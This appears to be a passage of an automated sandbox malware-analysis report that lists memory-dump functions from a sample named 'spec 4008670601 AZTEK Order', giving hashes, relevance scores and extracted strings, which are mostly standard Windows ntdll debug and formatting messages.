                                                      • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                      • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                      • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                      Function 017E2F60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                      • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                      • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                      • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                      Function 017E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                      • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                      • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                      • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                      Function 017E2FE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                      • Instruction ID: 0fca94e7977060ebeb59763a7dc45cb4d812b3cb0d3e7c2aabcc05a946e0f4f6
                                                      • Opcode Fuzzy Hash: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                      • Instruction Fuzzy Hash: 96900221215C0042D70076684C14B074005D7D1303F55C129A1154574CCA15CA755622
                                                      Function 017E2FB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                      • Instruction ID: 7ffa2d21d7ff0ce122559bda0b6cc416f7c2735e1bee329888a0144cf54fb9c7
                                                      • Opcode Fuzzy Hash: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                      • Instruction Fuzzy Hash: B1900221605400424640726888449078005FBE2211755C135A1998570DC659CA795766
                                                      Function 017E2FA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                      • Instruction ID: e1f079f35e608d5ad94e785f17228664fbe32c919039a0edbb27b7bfd8048554
                                                      • Opcode Fuzzy Hash: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                      • Instruction Fuzzy Hash: E090023120580402D600725848087474005D7D1302F55C025A6164575EC765CAA56632
                                                      Function 017E2F90 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                      • Instruction ID: d9febb8f12a19f75aa4bdab3256b3f537965d7c5311e4116f97cbde6e9e5cafe
                                                      • Opcode Fuzzy Hash: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                      • Instruction Fuzzy Hash: B590023120580402D6007258481470B4005D7D1302F55C025A2164575DC725CA656672
                                                      Function 017E2E30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                      • Instruction ID: bd5b6988b98bdd7ebfd36082277141264e73849b87d19ccc65e5120ae462754f
                                                      • Opcode Fuzzy Hash: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                      • Instruction Fuzzy Hash: 3390022130540402D602725844146074009D7D2345F95C026E2424575DC725CB67A233
                                                      Function 017E2EE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                      • Instruction ID: d7e9c6c208ee8a8ed4764d7b09ae70e6b349872286f701461f9c6b919a6d5ba1
                                                      • Opcode Fuzzy Hash: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                      • Instruction Fuzzy Hash: 9A90026120580403D640765848046074005D7D1302F55C025A3064575ECB29CE656236
                                                      Function 017E2EA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                      • Instruction ID: 90dc857c85d3e8993448a6292bc9f7599339c03b67bac65335ab26f228d8309d
                                                      • Opcode Fuzzy Hash: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                      • Instruction Fuzzy Hash: 8590027120540402D640725844047474005D7D1301F55C025A6064574EC759CFE96766
                                                      Function 017E2E80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                      • Instruction ID: a3b9a7e0a587a45723cb00d2949b40eb041668eb757a57189ee29a10781618eb
                                                      • Opcode Fuzzy Hash: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                      • Instruction Fuzzy Hash: 9D90022160540502D60172584404617400AD7D1241F95C036A2024575ECB25CBA6A232
                                                      Function 017E3010 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                      • Instruction ID: f59250e4770d0e19d23eb0730b09f07f85bd64a9afc2f77cae788fda0174fbc7
                                                      • Opcode Fuzzy Hash: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                      • Instruction Fuzzy Hash: 1F90022120584442D64073584804B0F8105D7E2202F95C02DA5156574CCA15CA695722
                                                      Function 017E3090 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                      • Instruction ID: 7518df012147020bf278f6f953c188b8591faebdd23702be240d78f4fa555d09
                                                      • Opcode Fuzzy Hash: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                      • Instruction Fuzzy Hash: 0A90022124540802D640725884147074006D7D1601F55C025A1024574DC716CB7967B2
                                                      Function 017E39B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                      • Instruction ID: a7f7f84ff2c0b91613d8efa65152bd0e5e9b3798271f75486db265ff8d2cc528
                                                      • Opcode Fuzzy Hash: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                      • Instruction Fuzzy Hash: 7390022124945102D650725C44046178005F7E1201F55C035A18145B4DC655CA696322
                                                      Function 017E3D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                      • Instruction ID: 1bbaf283fb038aa6a6756da4a75377ec0c01c547d3630403fd55e450db913ee2
                                                      • Opcode Fuzzy Hash: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                      • Instruction Fuzzy Hash: 8990023520540402DA10725858046474046D7D1301F55D425A1424578DC754CAB5A222
                                                      Function 017E3D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                      • Instruction ID: 26cb14000f2b546b4e05629e6c39602eb1cb4363adbfc7d1b91cffa7072be0d0
                                                      • Opcode Fuzzy Hash: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                      • Instruction Fuzzy Hash: D8900231206401429A4073585804A4F8105D7E2302B95D429A1015574CCA14CA755322
                                                      Function 017E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: 282b390c799939476a8114c964645d9b8899f5fb88ab7cbf9e26f997ec0e196a
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 017E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                      • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                      • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                      • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                      Function 01852410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                      • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                      • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                      • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                      Function 017D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                      • Execute=1, xrefs: 01814713
                                                      • ExecuteOptions, xrefs: 018146A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                      • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                      • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                      • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                      Function 017EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                      Function 018520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                      • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                      • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                      • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                      Function 017CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 0181031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                      • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                      • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                      • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                      Function 017DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 01817BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                      • RTL: Resource at %p, xrefs: 01817B8E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                      • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                      • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                      • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                      Function 017DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 018172C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                      • RTL: Resource at %p, xrefs: 018172A3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                      • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                      • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                      • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                      Function 01852300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                      • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                      • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                      • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                      Function 017E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                      Function 017A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                      • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                      • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                      • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0
                                                      Function 0182CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0182CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Cw@4Cw
                                                      • API String ID: 4062629308-3101775584
                                                      • Opcode ID: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                      • Instruction ID: 084a9f5174b8fc094d1b162a9402e10e031d6a62d059cca4c1b5fed9c858603a
                                                      • Opcode Fuzzy Hash: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                      • Instruction Fuzzy Hash: E941B271900229DFCB229FA9C884AAEFBF8FF54740F14412AE915DB264D774DA41CB61

                                                      Execution Graph

